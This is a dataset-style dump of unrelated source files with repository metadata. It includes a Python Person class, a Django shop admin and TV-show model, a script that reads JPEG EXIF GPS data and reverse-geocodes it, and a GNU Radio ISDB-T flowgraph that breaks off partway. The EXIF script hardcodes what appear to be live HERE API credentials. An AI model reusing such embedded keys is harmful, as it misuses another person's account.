list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts'} # type: ignore
| [
"noreply@github.com"
] | noreply@github.com |
f1d6c053ab19fde48f2886203d3ce102e1ac3d2b | 4b558f3501407de951b686810794e18a4b2902cb | /Person.py | c90c6d96686ce2ae80fb8957e8f6434c2b1d0eb2 | [] | no_license | AmitGreen/TeacherSample | 05be63527b37f013adc6de6d8499668d717c8a73 | efb12aea1ac737d8ae2ab0ee8aa550adbd34edc1 | refs/heads/master | 2020-04-14T19:46:40.606477 | 2019-01-04T07:03:03 | 2019-01-04T07:13:57 | 164,070,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | #
# Copyright (c) 2019 Amit Green. All rights reserved.
#
#
# Person
# Base class of Student and Teacher
#
class Person(object):
__slots__ = ((
'identifier', # PersonIdentifier
))
is_student = False
is_teacher = False
def __init__(self, identifier):
self.identifier = identifier
def __repr__(self):
return '<{} {!r} #{}>'.format(self.__class__.__name__, self.name, self.number)
@property
def name(self):
return self.identifier.name
@property
def number(self):
return self.identifier.number
#
# Exports
#
__all__ = ((
'Person',
))
| [
"amit.mixie@gmail.com"
] | amit.mixie@gmail.com |
f70cab19ea72af45550d3d357554c561f60bd2f2 | eb13de99f7092685cf7356cf3bff49342a070756 | /lab4/example3.py | 70f7f7d3a40059daaf8e6e55deb16fe689ac1dc5 | [] | no_license | e56485766/280201109 | 711874a84852e5160e9753c408462f6241a8f034 | 466a9a89e947e4515a6622d921b97979064fd518 | refs/heads/master | 2023-02-18T08:27:52.871387 | 2021-01-18T10:03:51 | 2021-01-18T10:03:51 | 311,320,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | nums = [8, 60, 43, 55, 25, 134, 1]
sum = 0
for i in nums:
sum += i
print(sum) | [
"ege_yucel_90@hotmail.com"
] | ege_yucel_90@hotmail.com |
b59746db08e06102b15d6584d17af086dbf60ad3 | 2354ad69c4134ab1141890f45007979614b6891a | /jpeg_location.py | d7fda35834c2f15abe808bf29bef451ffad11b34 | [] | no_license | dmullz/jpegLocationFinder | cad159ed1bda2da1e845d17009cfac2701f7696f | 7086a36d628dbcb41f4740bb37d2b24f0eba43aa | refs/heads/master | 2020-08-26T16:09:10.145197 | 2019-10-26T03:48:52 | 2019-10-26T03:48:52 | 217,067,645 | 0 | 0 | null | 2019-10-27T14:33:33 | 2019-10-23T13:42:38 | Python | UTF-8 | Python | false | false | 4,159 | py | from PIL import Image
from PIL.ExifTags import TAGS
from PIL.ExifTags import GPSTAGS
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.styles import Font
import requests
import os
HERE_APP_ID = "vQCC4M7DiyR3w4sNySuk"
HERE_APP_CODE = "J0hDHbYEc9lf5WXlXszxCw"
# @DEV - Function to add a row to the excel file
# @param excel - string of file location of excel document
# @param filename - string of path to an image file
# @param location - string of the zip code parsed from image file
def add_to_excel(excel,filename,location):
# Format row
new_row = [filename,location]
# Load excel or build excel if this is the first one
try:
workbook = load_workbook(excel)
worksheet = workbook.worksheets[0]
except FileNotFoundError:
headers_row = ["Image File", "Zip Code"]
font = Font(bold=True)
workbook = Workbook()
worksheet = workbook.active
worksheet.append(headers_row)
for cell in worksheet["1:1"]:
cell.font = font
# Add row to Excel doc
worksheet.append(new_row)
workbook.save(excel)
# @DEV - Generator to get the next image file
# @param dir - directory containing image files (or singular file)
# @RET (string) - Yields a file to attempt to decode
def image_gen(dir):
if os.path.isfile(dir):
yield dir
else:
files = []
for (dirpath, dirnames, filenames) in os.walk(dir):
files.extend(filenames)
break
for file in files:
yield file
# @DEV - Function to find geotagging data in EXIF data
# @param exif - dictionary of EXIF data from a JPEG image
# @RET (dict) - returns a dictionary of geotagging data
def get_geotagging(exif):
if not exif:
raise ValueError("No EXIF metadata found")
print(GPSTAGS.items())
geotagging = {}
for (idx, tag) in TAGS.items():
if tag == 'GPSInfo':
if idx not in exif:
return None
for (key, val) in GPSTAGS.items():
if key in exif[idx]:
geotagging[val] = exif[idx][key]
return geotagging
# @DEV - Function to get the EXIF data in an image file.
# @param filename - string containing the path to a file
# @RET (dict) - returns a dictionary of EXIF data, or None if the file cannot be read or is not a JPEG
def get_exif(filename):
try:
image = Image.open(filename)
image.verify()
print("Image Info", image.info)
if image.format.lower() != 'jpeg':
print("File", filename, "is not a JPEG.")
return None
exif = image._getexif()
print("exif:",exif)
return exif
except:
print("There was a problem reading file", filename)
return None
# @DEV - Function to convert degrees, minutes, and seconds to a latitude/longitude
# @param dms - matrix of degrees, minutes, and seconds data
# @param ref - string of bearing information (N,S,E,W)
# @RET (float) - returns a float representing latitude/longitude coordinates
def get_decimal_from_dms(dms, ref):
degrees = dms[0][0] / dms[0][1]
minutes = dms[1][0] / dms[1][1] / 60.0
seconds = dms[2][0] / dms[2][1] / 3600.0
if ref in ['S', 'W']:
degrees = -degrees
minutes = -minutes
seconds = -seconds
return round(degrees + minutes + seconds, 5)
# @DEV - Function to get latitude/longitude from geotagging data
# @param geotags - dictionary of geotagging data
# @RET (tuple) - returns floats of latitude and longitude coordinates
def get_coordinates(geotags):
lat = get_decimal_from_dms(geotags['GPSLatitude'], geotags['GPSLatitudeRef'])
lon = get_decimal_from_dms(geotags['GPSLongitude'], geotags['GPSLongitudeRef'])
return (lat,lon)
# @DEV - Function to find location data from geotagging data in a JPEG
# @param geotags - dictionary of geotagging data
# @RET (dictionary) - returns JSON containing location data for the image
def get_location(geotags):
coords = get_coordinates(geotags)
uri = 'https://reverse.geocoder.api.here.com/6.2/reversegeocode.json'
headers = {}
params = {
'app_id': HERE_APP_ID,
'app_code': HERE_APP_CODE,
'prox': "%s,%s" % coords,
'gen': 9,
'mode': 'retrieveAddresses',
'maxresults': 1,
}
response = requests.get(uri, headers=headers, params=params)
try:
response.raise_for_status()
return response.json()
except requests.exceptions.HTTPError as e:
print(str(e))
return {} | [
"dangermouse12885@gmail.com"
] | dangermouse12885@gmail.com |
c6a4f7fd762b8c458facb55f5b26d1bc13b3c944 | e16d7d8f60145c68640b25aa7c259618be60d855 | /django_by_example/myshop/orders/admin.py | f09d215605498c4504e1c955a53d7fe07aa330af | [] | no_license | zongqiqi/mypython | bbe212223002dabef773ee0dbeafbad5986b4639 | b80f3ce6c30a0677869a7b49421a757c16035178 | refs/heads/master | 2020-04-21T07:39:59.594233 | 2017-12-11T00:54:44 | 2017-12-11T00:54:44 | 98,426,286 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from django.contrib import admin
from .models import Order,OrderItem
class OrderItemInline(admin.TabularInline):
model = OrderItem
raw_id_fields = ['product']
class OrderAdmin(admin.ModelAdmin):
list_display = ['id', 'first_name', 'last_name', 'email','address', 'postal_code', 'city', 'paid','created', 'updated']
list_filter = ['paid', 'created', 'updated']
inlines = [OrderItemInline]#使用OrderItemline来把OrderItem引用为OrderAdmin类的内联类
#内联类允许你在同一个编辑页面引用模型,并且将这个模型作为父模型
admin.site.register(Order, OrderAdmin) | [
"544136329@qq.com"
] | 544136329@qq.com |
3ce9ae75cfba581fd1556d6acba08d404943f333 | 89ab7ddfbf71e67a07b81592376d365e487e7ab2 | /python_stack/django/django_full_stack/tv_shows_project/tv_shows_app/models.py | 5c09f7cd3b6d029a237a44bcf5b6c35b19d500e9 | [] | no_license | napatpiya/bootcamp | b9ec8b57f2bde960893fead2cd199d218d197128 | 456d71fbc87a3fac5fac2386ea5b5914a3b35141 | refs/heads/master | 2023-05-27T07:12:48.392117 | 2020-06-30T02:58:47 | 2020-06-30T02:58:47 | 237,839,511 | 0 | 0 | null | 2023-05-07T22:20:16 | 2020-02-02T21:28:10 | Python | UTF-8 | Python | false | false | 1,488 | py | from django.db import models
import datetime
# Create your models here.
class ValiManager(models.Manager):
def validator(self, postData, request):
errors = {}
print(datetime.date.today())
print(postData['reldate'])
present = datetime.date.today()
reldate = datetime.datetime.strptime(postData['reldate'], "%Y-%m-%d").date()
print(reldate > present)
if len(postData['title']) < 2:
errors["title"] = "Title name should be at least 2 characters"
if request.session['check'] == 1:
errors["title"] = "The title already exist in the database"
if len(postData['network']) < 3:
errors["network"] = "Network name should be at least 3 characters"
if postData['reldate'] == '':
errors['reldate'] = "Release Date should not be null"
if reldate > present:
errors['reldate'] = "Release Date should be the past"
if len(postData['desc']) != 0 and len(postData['desc']) < 10:
errors['desc'] = "Description name should be at least 10 characters (Optional)"
return errors
class TvShows(models.Model):
title = models.CharField(max_length=45)
network = models.CharField(max_length=20)
releasedate = models.DateField(null=True, blank=True)
description = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = ValiManager()
| [
"napat_ont@hotmail.com"
] | napat_ont@hotmail.com |
ad95a02abfd27b13261a61ab7c66af089dff71c2 | 57baad3ff3081f0e70f61c8613d4a5033303712a | /top_block.py | 8e1ab040cf61c24c71277661792878294035abd9 | [] | no_license | miliheredia8/ISDB-T | 5d8c6bc118008ff0f1508956a063eda3da1ff162 | 25d2f71674d44b549b9b5feba07c9f9a35eba161 | refs/heads/master | 2022-12-07T00:51:29.179071 | 2020-09-06T19:11:06 | 2020-09-06T19:11:06 | 281,508,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86,625 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Top Block
# Generated: Tue Jul 21 09:49:44 2020
##################################################
from distutils.version import StrictVersion
if __name__ == '__main__':
import ctypes
import sys
if sys.platform.startswith('linux'):
try:
x11 = ctypes.cdll.LoadLibrary('libX11.so')
x11.XInitThreads()
except:
print "Warning: failed to XInitThreads()"
from PyQt5 import Qt
from PyQt5 import Qt, QtCore
from gnuradio import analog
from gnuradio import blocks
from gnuradio import channels
from gnuradio import digital
from gnuradio import dtv
from gnuradio import eng_notation
from gnuradio import fft
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio.eng_option import eng_option
from gnuradio.fft import window
from gnuradio.filter import firdes
from gnuradio.qtgui import Range, RangeWidget
from optparse import OptionParser
import isdbt
import mer
import numpy as np
import pmt
import sip
import sys
from gnuradio import qtgui
class top_block(gr.top_block, Qt.QWidget):
def __init__(self):
gr.top_block.__init__(self, "Top Block")
Qt.QWidget.__init__(self)
self.setWindowTitle("Top Block")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "top_block")
self.restoreGeometry(self.settings.value("geometry", type=QtCore.QByteArray))
##################################################
# Variables
##################################################
self.samp_rate = samp_rate = 8e6*64/63
self.taps = taps = firdes.low_pass(1.0, samp_rate, 1e6, 6e6, firdes.WIN_HAMMING, 6.76)
self.mode = mode = 3
self.total_carriers = total_carriers = 2**(10+mode)
self.symbol_table_QPSK = symbol_table_QPSK = (1+1j, 1-1j, -1+1j, -1-1j)/np.sqrt(2)
self.symbol_table_64QAM = symbol_table_64QAM = (7+7j, 7+5j, 5+7j, 5+5j, 7+1j, 7+3j, 5+1j, 5+3j, 1+7j, 1+5j, 3+7j, 3+5j, 1+1j, 1+3j, 3+1j, 3+3j, 7-7j, 7-5j, 5-7j, 5-5j, 7-1j, 7-3j, 5-1j, 5-3j, 1-7j, 1-5j, 3-7j, 3-5j, 1-1j, 1-3j, 3-1j, 3-3j, -7+7j, -7+5j, -5+7j, -5+5j, -7+1j, -7+3j, -5+1j, -5+3j, -1+7j, -1+5j, -3+7j, -3+5j, -1+1j, -1+3j, -3+1j, -3+3j, -7-7j, -7-5j, -5-7j, -5-5j, -7-1j, -7-3j, -5-1j, -5-3j, -1-7j, -1-5j, -3-7j, -3-5j, -1-1j, -1-3j, -3-1j, -3-3j)/np.sqrt(42)
self.segments_c = segments_c = 0
self.segments_b = segments_b = 12
self.segments_a = segments_a = 1
self.phase_noise = phase_noise = 0
self.noise_volt = noise_volt = 0
self.length_c = length_c = 0
self.length_b = length_b = 2
self.length_a = length_a = 4
self.guard = guard = 1.0/16
self.frec_offset = frec_offset = 0
self.delay = delay = (len(taps)/2)-1
self.data_carriers = data_carriers = 13*96*2**(mode-1)
self.bb_gain = bb_gain = 0.0022097087
self.TOI = TOI = 0
self.SOI = SOI = 0
self.Quad_Offset = Quad_Offset = 0
self.Infase_Offset = Infase_Offset = 0
self.IQ_Phase_Imbalance = IQ_Phase_Imbalance = 0
self.IQ_Mag_Imbalance = IQ_Mag_Imbalance = 0
self.AjusteMascara = AjusteMascara = 0
##################################################
# Blocks
##################################################
self.tab = Qt.QTabWidget()
self.tab_widget_0 = Qt.QWidget()
self.tab_layout_0 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.tab_widget_0)
self.tab_grid_layout_0 = Qt.QGridLayout()
self.tab_layout_0.addLayout(self.tab_grid_layout_0)
self.tab.addTab(self.tab_widget_0, 'Medici\xc3\xb3n MER')
self.top_grid_layout.addWidget(self.tab)
self._phase_noise_range = Range(-50, 50, 1, 0, 200)
self._phase_noise_win = RangeWidget(self._phase_noise_range, self.set_phase_noise, 'Channel: Phase Noise', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._phase_noise_win, 3, 0, 1, 2)
for r in range(3, 4):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._noise_volt_range = Range(0, 1, 1e-3, 0, 200)
self._noise_volt_win = RangeWidget(self._noise_volt_range, self.set_noise_volt, 'Channel: Noise Voltage', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._noise_volt_win, 1, 0, 1, 2)
for r in range(1, 2):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._frec_offset_range = Range(-5e-3, 5e-3, 0.5e-3, 0, 200)
self._frec_offset_win = RangeWidget(self._frec_offset_range, self.set_frec_offset, 'Channel: Frequency Offset', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._frec_offset_win, 2, 0, 1, 2)
for r in range(2, 3):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._bb_gain_range = Range(0, 1, 1e-6, 0.0022097087, 200)
self._bb_gain_win = RangeWidget(self._bb_gain_range, self.set_bb_gain, "bb_gain", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._bb_gain_win, 0, 0, 1, 2)
for r in range(0, 1):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._TOI_range = Range(0, 120, 1, 0, 200)
self._TOI_win = RangeWidget(self._TOI_range, self.set_TOI, "TOI", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._TOI_win, 1, 2, 1, 3)
for r in range(1, 2):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._SOI_range = Range(0, 10, 1, 0, 200)
self._SOI_win = RangeWidget(self._SOI_range, self.set_SOI, "SOI", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._SOI_win, 0, 2, 1, 3)
for r in range(0, 1):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._Quad_Offset_range = Range(0, 100, 1, 0, 200)
self._Quad_Offset_win = RangeWidget(self._Quad_Offset_range, self.set_Quad_Offset, "Quad_Offset", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._Quad_Offset_win, 2, 2, 1, 3)
for r in range(2, 3):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._Infase_Offset_range = Range(0, 10, 0.5, 0, 200)
self._Infase_Offset_win = RangeWidget(self._Infase_Offset_range, self.set_Infase_Offset, "Infase_Offset", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._Infase_Offset_win, 3, 2, 1, 3)
for r in range(3, 4):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._IQ_Phase_Imbalance_range = Range(0, 90, 1, 0, 200)
self._IQ_Phase_Imbalance_win = RangeWidget(self._IQ_Phase_Imbalance_range, self.set_IQ_Phase_Imbalance, "IQ_Phase_Imbalance", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._IQ_Phase_Imbalance_win, 4, 2, 1, 3)
for r in range(4, 5):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._IQ_Mag_Imbalance_range = Range(0, 50, 1, 0, 200)
self._IQ_Mag_Imbalance_win = RangeWidget(self._IQ_Mag_Imbalance_range, self.set_IQ_Mag_Imbalance, "IQ_Mag_Imbalance", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._IQ_Mag_Imbalance_win, 4, 0, 1, 2)
for r in range(4, 5):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._AjusteMascara_range = Range(0, 100, 1, 0, 200)
self._AjusteMascara_win = RangeWidget(self._AjusteMascara_range, self.set_AjusteMascara, 'Ajuste mascara', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._AjusteMascara_win, 9, 1, 1, 2)
for r in range(9, 10):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 3):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_vector_sink_f_0 = qtgui.vector_sink_f(
4096,
-(samp_rate/2)/1e6,
(samp_rate/4096)/1e6,
'MHz',
'dBm',
"Espectro de RF",
4 # Number of inputs
)
self.qtgui_vector_sink_f_0.set_update_time(0.10)
self.qtgui_vector_sink_f_0.set_y_axis(-100, -0)
self.qtgui_vector_sink_f_0.enable_autoscale(False)
self.qtgui_vector_sink_f_0.enable_grid(True)
self.qtgui_vector_sink_f_0.set_x_axis_units("")
self.qtgui_vector_sink_f_0.set_y_axis_units("")
self.qtgui_vector_sink_f_0.set_ref_level(0)
labels = ['Espectro Se\xc3\xb1al', 'M\xc3\xa1scara No Cr\xc3\xadtica', 'M\xc3\xa1scara Sub-Cr\xc3\xadtica', 'M\xc3\xa1scara Cr\xc3\xadtica', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_vector_sink_f_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_vector_sink_f_0.set_line_label(i, labels[i])
self.qtgui_vector_sink_f_0.set_line_width(i, widths[i])
self.qtgui_vector_sink_f_0.set_line_color(i, colors[i])
self.qtgui_vector_sink_f_0.set_line_alpha(i, alphas[i])
self._qtgui_vector_sink_f_0_win = sip.wrapinstance(self.qtgui_vector_sink_f_0.pyqwidget(), Qt.QWidget)
self.tab_grid_layout_0.addWidget(self._qtgui_vector_sink_f_0_win, 7, 1, 2, 3)
for r in range(7, 9):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 4):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_number_sink_0_0 = qtgui.number_sink(
gr.sizeof_float,
0,
qtgui.NUM_GRAPH_VERT,
1
)
self.qtgui_number_sink_0_0.set_update_time(0.10)
self.qtgui_number_sink_0_0.set_title("Modulation Error Rate - RMS")
labels = ['', '', '', '', '',
'', '', '', '', '']
units = ['', '', '', '', '',
'', '', '', '', '']
colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
factor = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
for i in xrange(1):
self.qtgui_number_sink_0_0.set_min(i, 0)
self.qtgui_number_sink_0_0.set_max(i, 50)
self.qtgui_number_sink_0_0.set_color(i, colors[i][0], colors[i][1])
if len(labels[i]) == 0:
self.qtgui_number_sink_0_0.set_label(i, "Data {0}".format(i))
else:
self.qtgui_number_sink_0_0.set_label(i, labels[i])
self.qtgui_number_sink_0_0.set_unit(i, units[i])
self.qtgui_number_sink_0_0.set_factor(i, factor[i])
self.qtgui_number_sink_0_0.enable_autoscale(False)
self._qtgui_number_sink_0_0_win = sip.wrapinstance(self.qtgui_number_sink_0_0.pyqwidget(), Qt.QWidget)
self.tab_grid_layout_0.addWidget(self._qtgui_number_sink_0_0_win, 7, 4, 2, 1)
for r in range(7, 9):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(4, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_const_sink_x_0_0 = qtgui.const_sink_c(
1024, #size
"Constelación", #name
1 #number of inputs
)
self.qtgui_const_sink_x_0_0.set_update_time(0.10)
self.qtgui_const_sink_x_0_0.set_y_axis(-2, 2)
self.qtgui_const_sink_x_0_0.set_x_axis(-2, 2)
self.qtgui_const_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, "")
self.qtgui_const_sink_x_0_0.enable_autoscale(False)
self.qtgui_const_sink_x_0_0.enable_grid(True)
self.qtgui_const_sink_x_0_0.enable_axis_labels(True)
if not True:
self.qtgui_const_sink_x_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "red", "red", "red",
"red", "red", "red", "red", "red"]
styles = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
markers = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_const_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_const_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_const_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_const_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_const_sink_x_0_0.set_line_style(i, styles[i])
self.qtgui_const_sink_x_0_0.set_line_marker(i, markers[i])
self.qtgui_const_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_const_sink_x_0_0_win = sip.wrapinstance(self.qtgui_const_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.tab_grid_layout_0.addWidget(self._qtgui_const_sink_x_0_0_win, 7, 0, 2, 1)
for r in range(7, 9):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.mer_probe_mer_c_0_0_0 = mer.probe_mer_c((symbol_table_64QAM),0.05)
self.low_pass_filter_0_0 = filter.fir_filter_ccf(1, firdes.low_pass(
1, samp_rate, 5.8e6/2.0, 0.5e6, firdes.WIN_HAMMING, 6.76))
self.isdbt_tmcc_encoder_0 = isdbt.tmcc_encoder(3, True, 4, 64, 4, 1, 2, 0, length_a, length_b, 0, segments_a, segments_b, 0)
self.isdbt_time_interleaver_0 = isdbt.time_interleaver(3, segments_a, length_a, segments_b, length_b, segments_c, length_c)
self.isdbt_subset_of_carriers_0_0 = isdbt.subset_of_carriers(96*4*13, 96*4*1, 13*96*4-1)
self.isdbt_pilot_signals_0 = isdbt.pilot_signals(3)
self.isdbt_isdbt_rf_channel_decoding_0_0 = isdbt.isdbt_rf_channel_decoding(
max_freq_offset=31,
guard=0.0625,
mode=3,
snr=10,
tmcc_print=False,
)
self.isdbt_hierarchical_combinator_0 = isdbt.hierarchical_combinator(3, segments_a, segments_b, 0)
self.isdbt_frequency_interleaver_0 = isdbt.frequency_interleaver(True, 3)
self.isdbt_energy_dispersal_0_0 = isdbt.energy_dispersal(3, 64, 2, segments_b)
self.isdbt_energy_dispersal_0 = isdbt.energy_dispersal(3, 4, 1, segments_a)
self.isdbt_carrier_modulation_0_0 = isdbt.carrier_modulation(3, segments_b, 64)
self.isdbt_carrier_modulation_0 = isdbt.carrier_modulation(3, segments_a, 4)
self.isdbt_byte_interleaver_0_0 = isdbt.byte_interleaver(3, 64, 2, segments_b)
self.isdbt_byte_interleaver_0 = isdbt.byte_interleaver(3, 4, 1, segments_a)
self.fft_vxx_1 = fft.fft_vcc(total_carriers, False, (window.rectangular(total_carriers)), True, 1)
self.fft_vxx_0 = fft.fft_vcc(4096, True, (window.flattop(4096)), True, 1)
self.dtv_dvbt_reed_solomon_enc_0_0 = dtv.dvbt_reed_solomon_enc(2, 8, 0x11d, 255, 239, 8, 51, 1)
self.dtv_dvbt_reed_solomon_enc_0 = dtv.dvbt_reed_solomon_enc(2, 8, 0x11d, 255, 239, 8, 51, 1)
self.dtv_dvbt_inner_coder_0_0_0 = dtv.dvbt_inner_coder(1, 1512*4, dtv.MOD_64QAM, dtv.ALPHA4, dtv.C3_4)
self.dtv_dvbt_inner_coder_0_0 = dtv.dvbt_inner_coder(1, 1512*4, dtv.MOD_QPSK, dtv.ALPHA4, dtv.C2_3)
self.digital_ofdm_cyclic_prefixer_0 = digital.ofdm_cyclic_prefixer(total_carriers, total_carriers+int(total_carriers*guard), 0, '')
self.channels_impairments_0 = channels.impairments(phase_noise, IQ_Mag_Imbalance, IQ_Phase_Imbalance, Quad_Offset, Infase_Offset, frec_offset, SOI, TOI)
self.channels_channel_model_0 = channels.channel_model(
noise_voltage=noise_volt,
frequency_offset=frec_offset,
epsilon=1,
taps=(taps),
noise_seed=0,
block_tags=False
)
self.blocks_vector_to_stream_0_2_0 = blocks.vector_to_stream(gr.sizeof_gr_complex*1, 96*4*12)
self.blocks_vector_to_stream_0_1_0 = blocks.vector_to_stream(gr.sizeof_char*1, 1512*4)
self.blocks_vector_to_stream_0_1 = blocks.vector_to_stream(gr.sizeof_char*1, 1512*4)
self.blocks_vector_source_x_0_0_0 = blocks.vector_source_f((-60.0,-59.9,-59.9,-59.8,-59.8,-59.7,-59.6,-59.6,-59.5,-59.5,-59.4,-59.3,-59.3,-59.2,-59.2,-59.1,-59.0,-59.0,-58.9,-58.9,-58.8,-58.7,-58.7,-58.6,-58.6,-58.5,-58.4,-58.4,-58.3,-58.3,-58.2,-58.1,-58.1,-58.0,-58.0,-57.9,-57.8,-57.8,-57.7,-57.7,-57.6,-57.5,-57.5,-57.4,-57.4,-57.3,-57.2,-57.2,-57.1,-57.1,-57.0,-56.9,-56.9,-56.8,-56.8,-56.7,-56.6,-56.6,-56.5,-56.5,-56.4,-56.3,-56.3,-56.2,-56.2,-56.1,-56.0,-56.0,-55.9,-55.9,-55.8,-55.7,-55.7,-55.6,-55.6,-55.5,-55.4,-55.4,-55.3,-55.3,-55.2,-55.1,-55.1,-55.0,-55.0,-54.9,-54.8,-54.8,-54.7,-54.7,-54.6,-54.5,-54.5,-54.4,-54.3,-54.3,-54.2,-54.2,-54.1,-54.0,-54.0,-53.9,-53.9,-53.8,-53.7,-53.7,-53.6,-53.6,-53.5,-53.4,-53.4,-53.3,-53.3,-53.2,-53.1,-53.1,-53.0,-53.0,-52.9,-52.8,-52.8,-52.7,-52.7,-52.6,-52.5,-52.5,-52.4,-52.4,-52.3,-52.2,-52.2,-52.1,-52.1,-52.0,-51.9,-51.9,-51.8,-51.8,-51.7,-51.6,-51.6,-51.5,-51.5,-51.4,-51.3,-51.3,-51.2,-51.2,-51.1,-51.0,-51.0,-50.9,-50.9,-50.8,-50.7,-50.7,-50.6,-50.6,-50.5,-50.4,-50.4,-50.3,-50.3,-50.2,-50.1,-50.1,-50.0,-50.0,-49.9,-49.8,-49.8,-49.7,-49.7,-49.6,-49.5,-49.5,-49.4,-49.4,-49.3,-49.2,-49.2,-49.1,-49.1,-49.0,-48.9,-48.9,-48.8,-48.8,-48.7,-48.6,-48.6,-48.5,-48.5,-48.4,-48.3,-48.3,-48.2,-48.2,-48.1,-48.0,-48.0,-47.9,-47.9,-47.8,-47.7,-47.7,-47.6,-47.6,-47.5,-47.4,-47.4,-47.3,-47.3,-47.2,-47.1,-47.1,-47.0,-47.0,-46.9,-46.8,-46.8,-46.7,-46.7,-46.6,-46.5,-46.5,-46.4,-46.4,-46.3,-46.2,-46.2,-46.1,-46.1,-46.0,-45.9,-45.9,-45.8,-45.8,-45.7,-45.6,-45.6,-45.5,-45.5,-45.4,-45.3,-45.3,-45.2,-45.2,-45.1,-45.0,-45.0,-44.9,-44.9,-44.8,-44.7,-44.7,-44.6,-44.6,-44.5,-44.4,-44.4,-44.3,-44.3,-44.2,-44.1,-44.1,-44.0,-44.0,-43.9,-43.8,-43.8,-43.7,-43.7,-43.6,-43.5,-43.5,-43.4,-43.3,-43.3,-43.2,-43.2,-43.1,-43.0,-43.0,-42.9,-42.9,-42.8,-42.7,-42.7,-42.6,-42.6,-42.5,-42.4,-42.4,-42.3,-42.3,-42.2,-42.1,-42.1,-42.0,-42.0,-41.9,-41.8,-41.8